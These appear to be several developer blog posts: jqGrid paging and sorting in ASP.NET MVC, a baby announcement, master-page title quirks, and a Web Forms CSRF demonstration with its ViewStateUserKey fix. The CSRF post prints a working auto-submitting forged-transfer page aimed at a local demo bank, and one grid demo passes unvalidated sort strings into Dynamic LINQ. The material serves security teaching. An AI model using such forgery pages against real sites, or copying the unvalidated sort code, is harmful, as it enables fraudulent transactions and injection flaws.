By naming the arguments to the action method exactly the same as what is in the query string, we have a very convenient way to retrieve these values. Remember, arguments passed to an action method should be treated with care. Never trust user input!
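For instance, even in demo code it doesn’t hurt to sanity check the paging values before using them. This little guard is hypothetical, not part of the original demo, and would go at the top of the action method:

// Hypothetical defensive checks for the grid's query string values.
if (page < 1) {
  page = 1; // jqGrid pages are 1-based
}
rows = Math.Min(Math.Max(rows, 1), 100); // clamp the page size to a sane range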

In this example, we statically create some JSON data and use the Json helper method to return the data back to the grid and Voila! It works!

jquery-grid-demo

Yeah, this is great for a simple demo, but I use a real database to store my data! Understood. It’s time to hook this up to a real database. As you might guess, I’ll use the HaackOverflow database for this demo as well as LinqToSql.

I’ll assume you know how to add a database and create a LinqToSql model already. If not, look at the source code I’ve included. Once you’ve done that, it’s pretty easy to transformat the data we get back into the proper JSON format.

public ActionResult LinqGridData(string sidx, string sord, int page, int rows) {
  var context = new HaackOverflowDataContext();

  var jsonData = new {
    total = 1, //todo: calculate
    page = page,
    records = context.Questions.Count(),
    rows = (
      from question in context.Questions
      select new {
        id = question.Id,
        cell = new string[] { 
          question.Id.ToString(), question.Votes.ToString(), question.Title 
        }
      }).ToArray()
  };
  return Json(jsonData, JsonRequestBehavior.AllowGet);
}

Note that the method is a tiny bit busier, but it follows the same basic structure as the JSON data. After changing the JavaScript code in the view to point to this action instead of the other, we can now see the first ten records from the database in the grid.

But we’re not done yet. At this point, we want to implement paging and sorting. Paging is pretty easy, but sorting is a bit tricky. After all, what we get passed into the action method is the name of the sort column. At that point, we want to dynamically create a LINQ expression that sorts by that column.

One easy way to do this is to use the Dynamic Linq Query library which ScottGu wrote about a while back. This library adds extension methods which make it easy to create more dynamic Linq queries based on strings. Of course, with great power comes great responsibility. Make sure to validate the strings before you pass them into the methods. With this in place, we rewrite the action method to be (warning, DEMO CODE AHEAD!):

public ActionResult DynamicGridData
    (string sidx, string sord, int page, int rows) {
  var context = new HaackOverflowDataContext();
  int pageIndex = Convert.ToInt32(page) - 1;
  int pageSize = rows;
  int totalRecords = context.Questions.Count();
  int totalPages = (int)Math.Ceiling((float)totalRecords / (float)pageSize);

  var questions = context.Questions
    .OrderBy(sidx + " " + sord)
    .Skip(pageIndex * pageSize)
    .Take(pageSize);

  var jsonData = new {
    total = totalPages,
    page = page,
    records = totalRecords,
    rows = (
      from question in questions
      select new {
        id = question.Id,
        cell = new string[] {
          question.Id.ToString(), question.Votes.ToString(), question.Title 
        }
    }).ToArray()
  };
  return Json(jsonData, JsonRequestBehavior.AllowGet);
}

Some things to note: The first part of this method does some initial calculations to figure out the number of pages we’re dealing with based on the page size (passed in) and the total record count.

Then given that info, we use the Dynamic Linq extension methods to do the actual paging and sorting via the line:

var questions = context.Questions.OrderBy(…).Skip(…).Take(…);

Once we have that, we can simply transform that into the array that jQuery grid expects and place that in the larger JSON payload represented by the jsonData variable.
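Since sidx and sord come straight off the query string, one way to honor that earlier “validate the strings” warning is a simple whitelist check before building the OrderBy clause. The column names below match the demo, but the helper itself is my own sketch:

private static readonly string[] _sortableColumns = { "Id", "Votes", "Title" };

private static bool IsValidSort(string sidx, string sord) {
  // Only allow known column names and the two legal sort directions.
  return Array.IndexOf(_sortableColumns, sidx) >= 0
    && (sord == "asc" || sord == "desc");
}

If the check fails, you might fall back to a default sort rather than pass the raw strings into the Dynamic Linq methods.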

With all this in place, you now have a pretty snazzy approach to paging and sorting data using AJAX. Now go forth and wow your customers. ;)

And before I forget, here’s the sample project that uses all three approaches.

personal comments edit

Every good developer knows to always have a backup. For example, over two years ago, I announced my world domination plans. But there was a single point of failure in me putting all my world domination plans on the tiny shoulders of just one progeny. My boy needs a partner in crime.

mia

So my wife and I conspired together and we’re happy to announce that baby #2 is on the way. Together, the two of them will be unstoppable!

My wife is past her first trimester and we expect the baby to RTF (Release To Family) around October.

This second time around has been a bit more challenging. My poor wife, bless her heart, has had to deal with much more severe nausea.

Notice the crinkle in the ultrasound photo. My son did that. ;) He’s trying to destroy the evidence.

Many of you who have more than one child might be able to relate to this, but I really considered not writing a blog announcement for my second child. There was the feeling that it was such a novel thing the first time, but now it’s becoming old hat (not really!).

But then I mentally fast forwarded 16 years later and pictured my future daughter finding the firstborn announcement and not finding her own blog announcement. Try explaining that to a kid. I can deal without the drama.

Well I won’t have to! Hi honey, here’s your announcement. Now you be good while daddy goes shopping for a shotgun and a shovel. :)

asp.net, asp.net mvc comments edit

There are a couple of peculiarities worth understanding when dealing with title tags and master pages within Web Forms and ASP.NET MVC. These assume you are using the HtmlHead control, aka <head runat="server" />.

The first peculiarity involves a common approach where one puts a ContentPlaceHolder inside of a title tag like we do with the default template in ASP.NET MVC:

<%@ Master ... %>
<html>
<head runat="server">
  <title>
    <asp:ContentPlaceHolder ID="titleContent" runat="server" />
  </title>
</head>
...

What’s nice about this approach is you can set the title tag from within any content page.

<asp:Content ContentPlaceHolderID="titleContent" runat="server">
  Home
</asp:Content>

But what happens if you want to set part of the title from within the master page? For example, you might want the title of every page to end with a suffix, “ – MySite”.

If you try this (notice the – MySite tacked on):

<%@ Master ... %>
<html>
<head runat="server">
  <title>
    <asp:ContentPlaceHolder ID="titleContent" runat="server" /> - MySite
  </title>
</head>
...

And run the page, you’ll find that the – MySite is not rendered. This appears to be a quirk of the HtmlHead control. This is because the title tag within the HtmlHead control is now itself a control. This will be familiar to those who understand how the AddParsedSubObject method works. Effectively, the only content allowed within the body of the HtmlHead control are other controls.

The fix is pretty simple. Add your text to a LiteralControl like so.

<%@ Master ... %>
<html>
<head runat="server">
  <title>
    <asp:ContentPlaceHolder ID="titleContent" runat="server" /> 
    <asp:LiteralControl runat="server" Text=" - MySite" />
  </title>
</head>
...

The second peculiarity has to do with how the HtmlHead control really wants to produce valid HTML markup.

If you leave the <head runat="server"></head> tag empty, and then view source at the rendered output, you’ll notice that it renders an empty <title> tag for you. It looked at its child controls collection and saw that it didn’t contain an HtmlTitle control so it rendered one for you.

This can cause problems when attempting to use a ContentPlaceHolder to render the title tag for you. For example, a common layout I’ve seen is the following.

<%@ Master ... %>
<html>
<head runat="server">
  <asp:ContentPlaceHolder ID="headContent" runat="server"> 
    <title>Testing</title>  
  </asp:ContentPlaceHolder>
</head>
...

This approach is neat because it allows you to not only set the title tag from within any content page, but any other content you want within the <head> tag.

However, if you view source on the rendered output, you’ll see two <title> tags, one that you specified and one that’s empty.

Going back to what I wrote earlier, the reason becomes apparent. The HtmlHead control checks to see if it contains a child title control. When it doesn’t find one, it renders an empty one. However, it doesn’t look within the content placeholders defined within it to see if they’ve rendered a title tag.

This makes sense when you consider how the HtmlHead tag works. It only allows placing controls inside of it. However, a ContentPlaceHolder allows adding literal text in there. So while it looks the same, the title tag within the ContentPlaceHolder is not an HtmlTitle control. It’s just some text, and the HtmlHead control doesn’t want to parse all the rendered text from its children.

This is why I tend to take the following approach with my own master pages.

<%@ Master ... %>
<html>
<head runat="server">
  <title><asp:ContentPlaceHolder ID="titleContent" runat="server" /></title>
  <asp:ContentPlaceHolder ID="headContent" runat="server"> 
  </asp:ContentPlaceHolder>
</head>
...

Happy Titling!

asp.net comments edit

In my last blog post, I walked step by step through a Cross-site request forgery (CSRF) attack against an ASP.NET MVC web application. This attack is the result of how browsers handle cookies and cross domain form posts and is not specific to any one web platform. Many web platforms thus include their own mitigations to the problem.

It might seem that if you’re using Web Forms, you’re automatically safe from this attack. While Web Forms has many mitigations turned on by default, it turns out that it does not automatically protect your site against this specific form of attack.

In the same sample bank transfer application I provided in the last post, I also included an example written using Web Forms which demonstrates the CSRF attack. After you log in to the site, you can navigate to /BankWebForm/default.aspx to try out the Web Form version of the transfer money page. It works just like the MVC version.

To simulate the attack, make sure you are running the sample application locally and make sure you are logged in and then click on http://haacked.com/demos/csrf-webform.html.

Here’s the code for that page:

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
    <title></title>
</head>
<body>
  <form name="badform" method="post"
    action="http://localhost:54607/BankWebForm/Default.aspx">
    <input type="hidden" name="ctl00$MainContent$amountTextBox"
      value="1000" />
    <input type="hidden" name="ctl00$MainContent$destinationAccountDropDown"
      value="2" />
    <input type="hidden" name="ctl00$MainContent$submitButton"
      value="Transfer" />
    <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET"
      value="" />
    <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT"
      value="" />
    <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
      value="/wEP...0ws8kIw=" />
    <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION"
      value="/wEWBwK...+FaB85Nc" />
    </form>
    <script type="text/javascript">
        document.badform.submit();
    </script>
</body>
</html>

It’s a bit more involved, but it does the trick. It mocks up all the proper hidden fields required to execute a bank transfer on my silly demo site.

The mitigation for this attack is pretty simple and described thoroughly in this article by Dino Esposito as well as this post by Scott Hanselman. The change I made to my code-behind based on Dino’s recommendation is the following:

protected override void OnInit(EventArgs e) {
  ViewStateUserKey = Session.SessionID;
  base.OnInit(e);
}

With this change in place, the CSRF attack I put in place no longer works.
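If you’d rather not repeat that override in every code-behind, one common approach (a sketch, not part of the demo project) is to put it in a shared base class that all your pages inherit from:

using System;
using System.Web.UI;

// Hypothetical site-wide base class; pages inherit this instead of Page.
public class BaseSecurePage : Page {
  protected override void OnInit(EventArgs e) {
    // Tie __VIEWSTATE to the current user's session so a forged cross-site
    // post carrying someone else's view state fails validation.
    ViewStateUserKey = Session.SessionID;
    base.OnInit(e);
  }
}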

When you go to a real bank site, you’ll learn they have all sorts of protections in place above and beyond what I described here. Hopefully this post and the previous one provided some insight into why they do all the things they do. :)

Technorati Tags: asp.net,security